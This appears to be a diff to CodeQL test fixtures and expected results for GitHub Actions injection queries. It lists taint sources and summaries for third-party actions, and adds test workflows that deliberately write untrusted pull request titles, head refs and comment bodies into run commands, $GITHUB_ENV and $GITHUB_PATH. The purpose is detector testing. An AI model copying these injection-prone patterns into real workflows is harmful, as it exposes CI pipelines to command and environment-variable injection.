mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | -| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | -| novuhq/novu | * | input.docker_name | output.image | taint | manual | -| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | -| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | -| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | -| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | -| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | -| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | -| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | -| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | -| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | -| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | -| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | -| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | -calls -| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | -needs -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -testNormalizeExpr -| foo['bar'] == baz | foo.bar == baz | -| github.event.pull_request.user["login"] | github.event.pull_request.user.login | -| github.event.pull_request.user['login'] | github.event.pull_request.user.login | -| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | -writeToGitHubEnv -| id1 | $(> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | @@ -295,37 +306,51 @@ cfgNodes | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | dfNodes | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | @@ -335,11 +360,14 @@ dfNodes | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | @@ -349,28 +377,39 @@ usesIds nodeLocations | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | | .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | @@ -380,64 +419,67 @@ nodeLocations | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/test.yml:1:1:40:53 | on: push | sources -| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | -| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | -| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | -| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | -| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | -| dorny/paths-filter | * | output.changes | PR changed files | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | -| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.all | PR changed files | manual | -| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | -| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | -| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | -| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | -| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | -| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | -| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | -| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | -| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | -| tj-actions/changed-files | * | output.added_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | -| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unknown_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | -| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | -| trilom/file-changes-action | * | output.files | PR changed files | manual | -| trilom/file-changes-action | * | output.files_added | PR changed files | manual | -| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | -| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | -| tzkhan/pr-update-action | * | output.headMatch | | manual | -| xt0rted/slash-command-action | * | output.command-arguments | | manual | +| ahmadnassri/action-changed-files | * | output.files | filename | manual | +| ahmadnassri/action-changed-files | * | output.json | json | manual | +| amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| dorny/paths-filter | * | output.changes | filename | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| jitterbit/get-changed-files | * | output.added | filename | manual | +| jitterbit/get-changed-files | * | output.added_modified | filename | manual | +| jitterbit/get-changed-files | * | output.all | filename | manual | +| jitterbit/get-changed-files | * | output.deleted | filename | manual | +| jitterbit/get-changed-files | * | output.modified | filename | manual | +| jitterbit/get-changed-files | * | output.removed | filename | manual | +| jitterbit/get-changed-files | * | output.renamed | filename | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| marocchino/on_artifact | * | output.* | artifact | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| tj-actions/branch-names | * | output.current_branch | branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | +| tj-actions/branch-names | * | output.ref_branch | branch | manual | +| tj-actions/changed-files | * | output.added_files | filename | manual | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | filename | manual | +| tj-actions/changed-files | * | output.all_changed_files | filename | manual | +| tj-actions/changed-files | * | output.all_modified_files | filename | manual | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | filename | manual | +| tj-actions/changed-files | * | output.changed_keys | filename | manual | +| tj-actions/changed-files | * | output.copied_files | filename | manual | +| tj-actions/changed-files | * | output.deleted_files | filename | manual | +| tj-actions/changed-files | * | output.modified_files | filename | manual | +| tj-actions/changed-files | * | output.modified_keys | filename | manual | +| tj-actions/changed-files | * | output.other_changed_files | filename | manual | +| tj-actions/changed-files | * | output.other_deleted_files | filename | manual | +| tj-actions/changed-files | * | output.other_modified_files | filename | manual | +| tj-actions/changed-files | * | output.renamed_files | filename | manual | +| tj-actions/changed-files | * | output.type_changed_files | filename | manual | +| tj-actions/changed-files | * | output.unknown_files | filename | manual | +| tj-actions/changed-files | * | output.unmerged_files | filename | manual | +| tj-actions/verify-changed-files | * | output.changed-files | filename | manual | +| trilom/file-changes-action | * | output.files | filename | manual | +| trilom/file-changes-action | * | output.files_added | filename | manual | +| trilom/file-changes-action | * | output.files_modified | filename | manual | +| trilom/file-changes-action | * | output.files_removed | filename | manual | +| tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| xt0rted/slash-command-action | * | output.command-arguments | text | manual | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml index c3c94755efd6..8ca103cbb6a1 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -9,5 +9,7 @@ jobs: steps: - name: Code Injection, do not report as ENV VAR INJ run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + - name: Code Injection, do not report as ENV VAR INJ + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.head.ref }}") >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 733b15fc9564..5061f51db624 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -45,5 +45,9 @@ jobs: cat <<-"EOF" >> "$GITHUB_ENV" echo "FOO=$TITLE" EOF + - env: + TITLE: ${{ github.event.pull_request.head.ref }} + run: | + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 56345ca896a8..1cb0b78a29b2 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -7,6 +7,7 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | @@ -25,6 +26,8 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected index 2dfa8702d591..af4b70d3a601 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected @@ -22,5 +22,4 @@ subpaths | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> 